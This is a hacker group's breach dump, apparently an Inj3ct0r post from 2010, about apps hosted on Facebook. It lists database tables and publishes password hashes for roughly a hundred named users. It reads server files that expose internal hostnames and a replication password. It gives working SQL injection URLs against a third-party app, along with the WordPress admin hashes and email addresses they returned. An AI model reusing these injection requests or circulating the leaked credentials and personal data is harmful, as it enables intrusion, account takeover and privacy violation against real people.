[1]aka_seriesname [2]apiusers [3]banners [4]deletions [5]genres [6]imgstatus [7]languages [8]mirrors [9]networks [10]ratings [11]runtimes [12]seriesactors [13]seriesupdates [14]translation_episodename [15]translation_episodeoverview [16]translation_labels [17]translation_seriesname [18]translation_seriesoverview [19]tvepisodes [20]tvseasons [21]tvseries [22]user_episodes [23]users
users:
id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites, favorites_displaymode,bannerlimit,banneragreement,active,uniqueid, lastupdatedby_admin,mirrorupdate
[userpass]
[1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E: [2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D: [3] *887C5DA43E5ACEE73689956A4497C0EDA956E790: [4] *57D6D9BF9F1962C9A006BB451FAF21693624391E: [5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B: [6] 3d801aa532c1cec3ee82d87a99fdf63f
[Database]: wiki
[24]archive [25]categorylinks [26]externallinks [27]filearchive [28]hitcounter [29]image [30]imagelinks [31]interwiki [32]ipblocks [33]job [34]langlinks [35]logging [36]math [37]objectcache [38]oldimage [39]page [40]page_restrictions [41]pagelinks [42]querycache [43]querycache_info [44]querycachetwo [45]recentchanges [46]redirect [47]revision [48]searchindex [49]site_stats [50]templatelinks [51]text [52]trackbacks [53]transcache [54]user [55]user_groups [56]user_newtalk [57]watchlist
user:
user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time, user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token, user_email_token_expires,user_registration,user_editcount
['user_name'] : ['user_pass']
[1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783: [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023: [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59: [4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87: [5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f: [6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4: [7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c: [8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5: [9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5: [10] Bsudbury: [10] 827d07956629c37855f3518374821872: [11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf: [12] Carla: [12] f41991b4dfd3b494c39751225e1faa29: [13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc: [14] Coco: [14] f6770367b7ca8261a25ea797c24761aa: [15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2: [16] Crippler: [16] b3d947a82648b2707130f176204cbbfd: [17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95: [18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be: [19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b: [20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba: [21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029: [22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026: [23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0: [24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19: [25] Eta: [25] f083e5e3fd924342f77e4111df8788e1: [26] Farrism: [26] efef4efa85d73ca0247052687ca9683b: [27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f: [28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee: [29] Fritigern: [29] 6a16028b432de68363a20912c31bca03: [30] Furby: [30] 117088a3b9b504ce23c7926c8691fced: [31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1: [32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c: [33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d: [34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448: [35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb: [36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46: [37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa: [38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7: [39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27: [40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412: [41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07: [42] Kakosi: [42] b747252b62d95163a083acf54141bfc6: [43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765: [44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76: [45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b: [46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814: [47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec: [48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5: [49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d: [50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8: [51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319: [52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9: [53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40: [54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb: [55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607: [56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52: [57] Mreuring: [57] 42472c97f021f725cea7670b078795a1: [58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a: [59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da: [60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580: [61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb: [62] Null dev: [62] 4e744d982a173d0e1439787da27f022c: [63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed: [64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453: [65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714: [66] Plambert: [66] 9333604b2eefdcc01debb843373ae492: [67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161: [68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43: [69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874: [70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731: [71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d: [72] Searlea: [72] 058beaa0d231d457136015119da5aa34: [73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c: [74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975: [75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd: [76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8: [77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540: [78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba: [79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf: [80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2: [81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a: [82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc: [83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f: [84] TommyD: [84] ca62c603dffc337b87a662fa904caa51: [85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5: [86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e: [87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301: [88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c: [89] Trololo23512: [89] 3d508eed899c625389167d2216fae370: [90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8: [91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd: [92] Wwarby: [92] 04409a510d208e737fa00cd97c712740: [93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74: [94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128: [95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b: [96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868:
---------------------------------------------------------------------------------------------------------------------------------------------------
read /etc/hosts
127.0.0.1 localhost localhost.localdomain 192.168.1.167 140696-db2.flufffriends.com 140696-db2 192.168.1.166 140695-db1.flufffriends.com 140695-db1 192.168.1.165 140694-web2.flufffriends.com 140694-web2 192.168.1.164 140693-web1.flufffriends.com 140693-web1 69.63.176.141 api.facebook.com 208.116.17.80 peanutlabs.com
----------------------------------
/etc/my.cnf
#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
log-bin=/var/lib/mysqllogs/bin-log
binlog-do-db=fluff2
expire-logs-days=14
server-id = 5
#master-host=69.63.176.141
#master-user=romis_user
#master-password=romis0123
#master-connect-retry=60
replicate-do-db=miserman
#log-slave-updates
expire_logs_days = 14
I think we found a sufficient number of vulnerabilities!
---------------------------
__ __ __ /'__`\ /'__`\ /'__`\ /\ \/\ \ __ _/\ \/\ \/\_\L\ \ \ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_ \ \ \_\ \/> </\ \ \_\ \/\ \L\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Inj3ct0r Crash Exploit]
So .. Moving on to the fun friends
To avoid Vandal effects of script-kidds I will not give you a link to shell.php, but I enclose you images and some interesting queries =]
..> Inj3ct0rExploit start . + . + . + . + . + . + .
wp_posts
post_password
wp_users
user_pass
done.....
WordPress! oO one of the modules installed in facebook is Wordpress!
check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1
oooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67
3 <= ALERT! Users! =]
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124
oooooooooooooooooooooooooooo
..> Inj3ct0r_Crach_exploit [ENTER]
user:
admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.
cracker:
admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:tom_kincaid@hotmail.com
see request:
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1-- http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1-- http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--
goOd =] Nice Hacking old school xD
__ __ __ __ /'__`\ /'__`\/\ \\ \ /\ \/\ \ __ _/\ \/\ \ \ \\ \ \ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_ \ \ \_\ \/> </\ \ \_\ \ \__ ,__\ \ \____//\_/\_\\ \____/\/_/\_\_/ \/___/ \//\/_/ \/___/ \/_/ [Conclusion]
There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)
__ __ ______ /'__`\ /'__`\/\ ___\ /\ \/\ \ __ _/\ \/\ \ \ \__/ \ \ \ \ \/\ \/'\ \ \ \ \ \___``\ \ \ \_\ \/> </\ \ \_\ \/\ \L\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Greetz]
Greetz all Member Inj3ct0r.com
Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org, exploit-db.com, MorningStarSecurity.com..... we have many friends)) Go http://inj3ct0r.com/links =]
Personally h4x0rz:
0x1D, Z0m!e, w01f, cr4wl3r (http://shell4u.oni.cc/), Phenom, bL4Ck_3n91n3, JosS (http://hack0wn.com/), eidelweiss, Farzin0123(Pianist), Th3 RDX, however, n1gh7m4r3, StutM (unitx.net) , Andrew Horton..
You are good hackers. Respect y0u!
Farzin0123(Pianist) visit site : Ueg88.blogfa.com ! Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!
At the time of publication, all requests to work! Attached images : inj3ct0r.com/facebook.zip
We want to thank the following people for their contribution.
Do not forget to keep track of vulnerabilities in Inj3ct0r.com
GoOd luck Hackers! =]
# Inj3ct0r.com [2010-04-06] |
|